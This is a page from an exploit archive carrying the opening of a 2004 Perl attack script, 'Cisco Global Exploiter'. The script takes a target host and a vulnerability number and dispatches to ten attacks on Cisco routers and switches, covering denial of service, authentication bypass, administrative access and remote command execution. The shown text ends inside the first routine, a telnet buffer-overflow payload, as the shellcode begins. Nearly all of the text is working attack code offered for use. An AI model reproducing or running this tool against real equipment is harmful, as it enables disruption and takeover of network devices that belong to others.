[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : Multiple Cisco Products Vulnerabilities Exploit (Cisco Global Exploiter)
# Published : 2004-03-28
# Author : blackangels
# Previous Title : Ethereal 0.10.0-0.10.2 IGAP Overflow Remote Root Exploit
# Next Title : eSignal 7.6 STREAMQUOTE Remote Buffer Overflow Exploit
#!/usr/bin/perl
##
# Cisco Global Exploiter
#
# Legal notes :
# The BlackAngels staff refuse all responsabilities
# for an incorrect or illegal use of this software
# or for eventual damages to others systems.
#
# www blackangels it
##
############
# Modules ##
############
use Socket;
use IO::Socket;
#########
# Main ##
#########
$host = "";
$expvuln = "";
$host = @ARGV[ 1 ];
$expvuln = @ARGV[ 3 ];
if ($host eq "") {
usage();
}
if ($expvuln eq "") {
usage();
}
if ($expvuln eq "1") {
cisco1();
}
elsif ($expvuln eq "2") {
cisco2();
}
elsif ($expvuln eq "3") {
cisco3();
}
elsif ($expvuln eq "4") {
cisco4();
}
elsif ($expvuln eq "5") {
cisco5();
}
elsif ($expvuln eq "6") {
cisco6();
}
elsif ($expvuln eq "7") {
cisco7();
}
elsif ($expvuln eq "8") {
cisco8();
}
elsif ($expvuln eq "9") {
cisco9();
}
elsif ($expvuln eq "10") {
cisco10();
}
else {
printf "nInvalid vulnerability number ...nn";
exit(1);
}
##############
# Functions ##
##############
sub usage
{
printf "nUsage :n";
printf "perl cge.pl -h <host> -v <vulnerability number>nn";
printf "Vulnerabilities list :n";
printf "[1] - Cisco 677/678 Telnet Buffer Overflow Vulnerabilityn";
printf "[2] - Cisco IOS Router Denial of Service Vulnerabilityn";
printf "[3] - Cisco IOS HTTP Auth Vulnerabilityn";
printf "[4] - Cisco IOS HTTP Configuration Arbitrary Administrative Access Vulnerabilityn";
printf "[5] - Cisco Catalyst SSH Protocol Mismatch Denial of Service Vulnerabilityn";
printf "[6] - Cisco 675 Web Administration Denial of Service Vulnerabilityn";
printf "[7] - Cisco Catalyst 3500 XL Remote Arbitrary Command Vulnerabilityn";
printf "[8] - Cisco IOS Software HTTP Request Denial of Service Vulnerabilityn";
printf "[9] - Cisco 514 UDP Flood Denial of Service Vulnerabilityn";
printf "[10] - CiscoSecure ACS for Windows NT Server Denial of Service Vulnerabilitynn";
exit(1);
}
sub cisco1 # Cisco 677/678 Telnet Buffer Overflow Vulnerability
{
my $serv = $host;
my $dch = "?????????????????a~ %%%%%XX%%%%%";
my $num = 30000;
my $string .= $dch x $num;
my $shc="